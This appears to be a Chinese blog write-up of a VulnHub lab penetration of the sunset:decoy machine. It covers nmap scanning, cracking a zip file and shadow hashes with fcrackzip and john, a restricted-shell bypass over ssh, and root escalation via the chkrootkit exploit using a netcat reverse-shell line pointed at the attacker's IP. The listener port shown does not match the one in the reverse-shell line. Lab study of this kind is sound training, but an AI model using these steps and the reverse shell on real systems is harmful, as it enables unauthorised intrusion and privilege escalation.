這里寫目錄標題

1.環境搭建
2.資訊收集
- - 2.1 主機發現
  - 2.2 埠掃描
  - 2.3 訪問80埠（http服務）
3. 漏洞利用
- - 3.1 使用壓縮包密碼破解工具爆破壓縮檔案密碼
  - 3.2 爆破用戶密碼
  - 3.3 ssh登錄
4.提權
- - - - 寫入反彈shell一句話
      - 給/tmp/update執行權限
      - kali開啟埠監聽
      - 執行檔案，獲取root權限
      - 使用python切換至互動式shell
5.總結

1.環境搭建

靶機環境搭建
攻擊滲透機： kali IP地址：192.168.33.139
靶機：sunset:decoy IP地址未知
靶機下載地址：https://www.vulnhub.com/entry/sunset-decoy,505/

2.資訊收集

2.1 主機發現

要進行滲透測驗，首先得知道目標靶機IP地址，使用netdiscover命令進行掃描獲取

netdiscover

在這里插入圖片描述
掃描得到目標靶機IP地址為：192.168.33.147 若掃描不到目標靶機IP地址，可查閱我寫的這篇文章進行解決https://blog.csdn.net/liver100day/article/details/119109320

2.2 埠掃描

知道了目標靶機的IP地址，接下來就掃描目標靶機，獲取目標靶機開放的埠和服務

nmap -T4 -sV -A -O -p- 192.168.33.147

在這里插入圖片描述
發現目標靶機開放了22埠（ssh服務），80埠（http服務）

2.3 訪問80埠（http服務）

訪問目標網頁，發現了一個壓縮包檔案
在這里插入圖片描述
使用命令將壓縮包檔案下載到本地

wget http://192.168.33.147/save.zip

在這里插入圖片描述
成功保存到了本地（檔案保存路徑若不指定的話，默認下載到你的當前路徑下）

果然需要密碼才行

3. 漏洞利用

3.1 使用壓縮包密碼破解工具爆破壓縮檔案密碼

我這里使用的壓縮包密碼破解工具為：fcrackzip，若是kali中并未安裝的話，輸入以下命令進行安裝

sudo apt-get install fcrackzip

在這里插入圖片描述
進行爆破密碼

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip

在這里插入圖片描述
爆破成功，密碼為：manuel
解壓壓縮包檔案，并對壓縮包內的檔案進行查看

unzip save.zip

在這里插入圖片描述

最后在shadow檔案里面，發現了296640a3b825115a47b68fc44501c828用戶和它已經加密過的密碼

3.2 爆破用戶密碼

使用john命令爆破一下密碼

john --wordlist=/usr/share/wordlists/rockyou.txt shadow
# 這條命令需要你進行 etc/ 目錄之后執行，否則需給出shadow檔案的詳細路徑

在這里插入圖片描述
這里爆破相當花時間，成功爆破，密碼為：server

3.3 ssh登錄

知道了用戶名和密碼，第一時間懷疑ssh，目標開放了22埠（ssh服務），開始登錄

ssh 296640a3b825115a47b68fc44501c828@192.168.33.147

在這里插入圖片描述
成功ssh登錄進去，但是卻發現很多命令都執行不了，是個受限制的shell

ssh連接時添加-t "bash --noprofile"即可bybass，然后再添加環境變數即可，拿到第一個flag

ssh 296640a3b825115a47b68fc44501c828@192.168.33.147 -t "bash --noprofile"
echo $PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

在這里插入圖片描述
這樣我們就可以正常執行命令了

但是卻無法以root權限執行任何操作

在user.txt檔案中找到了第一個flag

4.提權

發現SV-502目錄，在里面發現一個logs檔案
在這里插入圖片描述

在logs檔案中，發現了檔案log.txt

查看之后，發現是一個pspy64運行日志，有一條有用的資訊

在kali中查找有無這個服務的漏洞

searchsploit chkrootkit

在這里插入圖片描述
成功找到版本對應的漏洞利用檔案，查看這個漏洞利用檔案了解詳細資訊

cat /usr/share/exploitdb/exploits/linux/local/33899.txt

在這里插入圖片描述

漏洞利用檔案說的相當詳細了直接照著開始執行

寫入反彈shell一句話

echo "/usr/bin/nc -e /bin/sh 192.168.33.139 4444" > /tmp/update

在這里插入圖片描述

給/tmp/update執行權限

chmod 777 /tmp/update

在這里插入圖片描述

kali開啟埠監聽

nc -lvp 9966

在這里插入圖片描述

執行檔案，獲取root權限

進入**/home/296640a3b825115a47b68fc44501c828/目錄，輸入./honeypot.decoy**
在這里插入圖片描述
等待一分鐘過后,就有所顯示了

使用python切換至互動式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在這里插入圖片描述
成功拿取到flag，拿到了root權限，那目標靶機就已經完全被你攻破了

5.總結

1.反彈shell一句話木馬還有不熟練的地方
2.密碼破解工具使用較少
3.基礎命令總是會忘，還要多加練習

最近一直在學習，但是學習的東西很多很雜，于是便把自己的學習成果記錄下來，便利自己，幫助他人，希望本篇文章能對你有所幫助，有錯誤的地方，歡迎指出！！！喜歡的話，不要忘記點贊哦！！！

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/291785.html

標籤：其他

上一篇：Web安全之業務邏輯漏洞

下一篇：VMware虛擬機+Kali linux 2021.2 下載和安裝以及初始操作

vulnhub靶機sunset:decoy滲透筆記

這里寫目錄標題

1.環境搭建

2.資訊收集

2.1 主機發現

2.2 埠掃描

2.3 訪問80埠（http服務）

3. 漏洞利用

3.1 使用壓縮包密碼破解工具爆破壓縮檔案密碼

3.2 爆破用戶密碼

3.3 ssh登錄

4.提權

寫入反彈shell一句話

給/tmp/update執行權限

kali開啟埠監聽

執行檔案，獲取root權限

使用python切換至互動式shell

5.總結